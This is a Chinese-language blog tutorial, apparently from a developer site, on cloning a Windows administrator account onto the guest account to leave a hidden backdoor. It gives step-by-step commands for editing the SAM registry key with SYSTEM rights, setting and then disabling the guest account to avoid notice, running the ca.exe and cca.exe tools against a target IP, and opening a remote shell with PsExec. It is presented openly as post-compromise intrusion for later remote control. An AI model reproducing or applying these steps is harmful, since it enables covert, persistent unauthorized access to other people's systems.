账号克隆ca与caa工具的使用与隐蔽后门账户

一个比较简单的克隆原理,只复制“f”值,这样的账户隐蔽性要比完全克隆要低些,但是对自己很方便,如果目标机的管理员不是很厉害的话是发现不了的,但是在"query user"和"服务终端管理器"里面你所登录的用户还是"guest",还有就是用命令net localgroup administrators 还是可以看出group是管理员,所以说隐蔽性比完全克隆还要低。但是在net下,和用户管理中都看不出guest用户有什么问题。

具体方法:用system权限打开注册表,或者用psu命令格式为psu -p regedit -pid,后面的pid是系统进程winlogon的值,然后打开[HKEY_LOCAL_MACHINE\SAM\SAM\account\Users\000001f4]打开他的f值,然后复制到1f5的f值中,(如果是用注册表打开一定要使用system打开,不然啥都没有),然后再cmd下给guest改密码(net user guest password)然后激活guest账号(net user guest /active:y),然后我们把他禁用(net user guest /active:n)简单!

完全克隆就是,全部复制"f"和"v"的值。这样方法克隆出来的两个账户其实再系统里是一个账户,这样隐蔽性最高,除非使用专业工具查看,否则再net和用户管理中,还有"net localgroup administrator"都看不出来有什么问题。还有就是如果你登录上去以后,再guery user和终端控制器中你所登录的用户上面显示的都是administrator,这样我们就达到了超级隐蔽的目的。

ca和cca及psexec都是在命令行下运行的工具,打开cmd进入到工具所在的目录,然后显示一下确保我们没有走错。

我们已经得到了目标主机的管理权限,目标主机的用户名为:administrator,密码为:123456,在命令行中输入命令ca.exe \\目标IP地址 adminstrator 123456 guest 123456。

为了让后门账户更加隐蔽。不会被管理员轻易发现,还需要把guest账号禁用,这样就可以在以后的入侵中使用该被禁止的guest账号实现远程控制了。在自己的攻击机中输入PsExec.exe \\目标IP地址 -u adminstrator -p 123456 cmd.exe获得远程主机的命令行。如果发生错误先ping一下看看网络是否联通。

连接上以后输入net user guest /active:no命令来禁用本地guest账号,完成后exit退出。

到这里我们已经将adminstrator的权限克隆到了gurest账号上了,接下来我们使用cca来验证。cca.exe \\目标主机IP administrator 123456 命令查看远程主机。

为了再次验证是否已经克隆成功,然后我们在攻击机cmd中输入,PsExec.exe \\目标IP地址 -u administrator -p 123456 cmd.exe登入后输入net user guest /active:yes激活guest。接下来我们就可以用同样的步骤连接guest账号了。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值